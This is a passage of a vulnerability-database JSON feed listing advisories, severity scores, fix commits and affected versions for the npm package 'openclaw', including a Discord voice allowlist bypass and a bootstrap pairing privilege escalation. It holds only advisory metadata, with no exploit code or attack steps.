                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-43534"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-unsanitized-external-input-in-agent-hook-events",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "6.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"
                        },
                        {
                            "value": "9.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-05-06T14:12:17Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-unsanitized-external-input-in-agent-hook-events"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-7g8c-cfr3-vqqr",
                    "reference_id": "GHSA-7g8c-cfr3-vqqr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-7g8c-cfr3-vqqr"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109896?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.10",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-6cfj-zugb-7uhq"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-h9a4-1twb-d7d1"
                        },
                        {
                            "vulnerability": "VCID-hphn-8fnj-qkh2"
                        },
                        {
                            "vulnerability": "VCID-hy24-6xpe-pkb7"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-q3a2-qk5j-1yat"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2yd-uw91-9yck"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"
                }
            ],
            "aliases": [
                "CVE-2026-43534",
                "GHSA-7g8c-cfr3-vqqr"
            ],
            "risk_score": 4.2,
            "exploitability": "0.5",
            "weighted_severity": "8.4",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zg68-u5b5-vkft"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89363?format=api",
            "vulnerability_id": "VCID-zkum-rn42-yyfs",
            "summary": "OpenClaw: Discord voice manager bypasses channel-level member access allowlist\n## Summary\nDiscord voice manager bypasses channel-level member access allowlist\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: medium\n- Assessment: v2026.3.28 still accepts Discord voice ingress before channel allowlist authorization, and main-only gating means this remains a real shipped access-control bug.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `dba96e7507e0900f120e5e28e57755d69bf78759` — 2026-03-31T21:29:13+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zsxsoft for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41381",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10395",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10436",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10417",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41381"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/dba96e7507e0900f120e5e28e57755d69bf78759",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:29:48Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/dba96e7507e0900f120e5e28e57755d69bf78759"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cqgw-44wg-44rf",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:L/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:29:48Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cqgw-44wg-44rf"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41381",
                    "reference_id": "CVE-2026-41381",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41381"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-cqgw-44wg-44rf",
                    "reference_id": "GHSA-cqgw-44wg-44rf",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-cqgw-44wg-44rf"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-access-control-bypass-in-discord-voice-manager-via-channel-allowlist",
                    "reference_id": "openclaw-access-control-bypass-in-discord-voice-manager-via-channel-allowlist",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:29:48Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-access-control-bypass-in-discord-voice-manager-via-channel-allowlist"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41381",
                "GHSA-cqgw-44wg-44rf"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zkum-rn42-yyfs"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89142?format=api",
            "vulnerability_id": "VCID-zpb1-e3g9-vkbh",
            "summary": "OpenClaw: Unbound bootstrap setup codes allow privilege escalation during pairing\n## Summary\nBootstrap setup codes were not bound to the intended device role and scopes, allowing first-use privilege escalation during pairing.\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: high\n- Assessment: Real first-use bootstrap privilege-escalation bug; the fix shipped in v2026.3.22 and later, so keep this advisory open for publication at the current severity.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.13-1`\n- Patched versions: `>= 2026.3.22`\n- First stable tag containing the fix: `v2026.3.22`\n\n## Fix Commit(s)\n- `a600c72ed7d0045a27f58bf031d2b36ecb0141c9` — 2026-03-22T23:57:15-07:00\n\nOpenClaw thanks @tdjackey for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41386",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00044",
                            "scoring_system": "epss",
                            "scoring_elements": "0.1385",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00044",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13886",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00044",
                            "scoring_system": "epss",
                            "scoring_elements": "0.13882",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41386"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/a600c72ed7d0045a27f58bf031d2b36ecb0141c9",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N"
                        },
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:48:41Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/a600c72ed7d0045a27f58bf031d2b36ecb0141c9"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gg9v-mgcp-v6m7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N"
                        },
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:48:41Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gg9v-mgcp-v6m7"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41386",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41386"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-unbound-bootstrap-setup-codes",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
                        },
                        {
                            "value": "9.8",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
                        },
                        {
                            "value": "8.6",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:H/SA:N"
                        },
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-04-29T12:48:41Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-unbound-bootstrap-setup-codes"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-gg9v-mgcp-v6m7",
                    "reference_id": "GHSA-gg9v-mgcp-v6m7",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-gg9v-mgcp-v6m7"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2hca-3v8f-f3e8"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2v8n-mnws-jfc9"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-32zs-2zs9-uufs"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-37ep-9smd-zuh9"
                        },
                        {
